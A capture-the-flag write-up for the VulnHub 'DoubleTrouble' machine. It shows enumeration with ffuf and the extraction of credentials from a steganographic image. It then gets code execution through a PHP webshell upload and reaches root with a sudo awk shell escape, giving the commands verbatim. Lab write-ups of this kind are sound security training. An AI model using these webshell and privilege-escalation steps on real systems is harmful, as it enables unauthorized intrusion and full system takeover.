Created by: tasiyanci
Link: https://www.vulnhub.com/entry/doubletrouble-1,743/
Enumeration
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Ffuf
ffuf -u "http://192.168.1.162/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -mc all -fc 404,403 -c -e .txt,.html,.tar,.php,.js -fl 10images [Status: 301, Size: 315, Words: 20, Lines: 10]
js [Status: 301, Size: 311, Words: 20, Lines: 10]
css [Status: 301, Size: 312, Words: 20, Lines: 10]
install [Status: 301, Size: 316, Words: 20, Lines: 10]
uploads [Status: 301, Size: 316, Words: 20, Lines: 10]
template [Status: 301, Size: 317, Words: 20, Lines: 10]
core [Status: 301, Size: 313, Words: 20, Lines: 10]
readme.txt [Status: 200, Size: 470, Words: 60, Lines: 13]
index.php [Status: 200, Size: 5812, Words: 563, Lines: 144]
robots.txt [Status: 200, Size: 26, Words: 2, Lines: 3]
backups [Status: 301, Size: 316, Words: 20, Lines: 10]
check.php [Status: 200, Size: 0, Words: 1, Lines: 1]
secret [Status: 301, Size: 315, Words: 20, Lines: 10]
. [Status: 200, Size: 6993, Words: 593, Lines: 155]
batch [Status: 301, Size: 314, Words: 20, Lines: 10]
sf [Status: 301, Size: 311, Words: 20, Lines: 0]
/secret
Looking in the secret directory we find an image “doubletrouble.jpg”, Using steganography we can decode the message and get some creds!
stegseek doubletrouble.jpg -xf output
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "output".cat output
otisrush@localhost.com
oti[REDACTED]
Exploit
http://192.168.1.165/index.php/
Now we can log in.
According to the exploit found here: https://www.exploit-db.com/exploits/47954, we can upload a php webshell and gain access on changing the user image. After uploading the php shell.
Goto the http://IP/uploads/users/
Now we can execute code!
http://192.168.1.162/uploads/users/941147-shell_web.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Root
Checking the system we see we can use awk as any user with no password.
sudo -l
(ALL : ALL) NOPASSWD: /usr/bin/awk
Exploit to root!
sudo awk 'BEGIN {system("/bin/sh")}'
Thanks to https://twitter.com/tasiyanci for the box!